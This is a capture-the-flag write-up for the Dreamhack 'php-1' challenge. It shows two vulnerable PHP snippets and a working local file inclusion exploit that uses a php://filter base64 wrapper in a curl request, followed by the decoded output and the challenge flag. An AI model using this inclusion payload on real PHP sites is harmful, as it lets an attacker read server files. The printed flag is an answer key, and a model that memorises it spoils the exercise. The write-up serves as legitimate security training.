Post

php-1

Posted
By thanguyen165 1 min read

Description

This is a Back Office service written in php.

Use the LFI vulnerability to obtain the flag. The flag is located in /var/www/uploads/flag.php

Analyzation

Check the attaches files

1
2
3
4
5
6
7

<?php
    $file = $_GET['file']?$_GET['file']:'';
    if(preg_match('/flag|:/i', $file)){
        exit('Permission denied');
    }
    echo file_get_contents($file);
?>

1
2
3

<?php
    include $_GET['page']?$_GET['page'].'.php':'main.php';
?>

There are two ways to do LFI. But view.php is not the possible way because string "/flag" is blocked.

We can do LFI by index.php. Check owasp.org and whitehatinstitute.com.

Solution

1

curl http://host3.dreamhack.games:20299/?page=php://filter/read=convert.base64-encode/resource=/var/www/uploads/flag

1

PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw==

Note that /var/www/uploads/flag.php will not work! (Check index.php again for that)

1

$_GET['page'].'.php'

Then decode the base64

1

echo -n PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw== | base64 -d

1
2
3
4

<?php
        $flag = 'DH{bb9db1f303cacf0f3c91e0abca1221ff}';
?>
can you see $flag?

The flag is

1

DH{bb9db1f303cacf0f3c91e0abca1221ff}

Summarization

Practice, dreamhack
Web Exploitation LFI
This post is licensed under CC BY 4.0 by the author.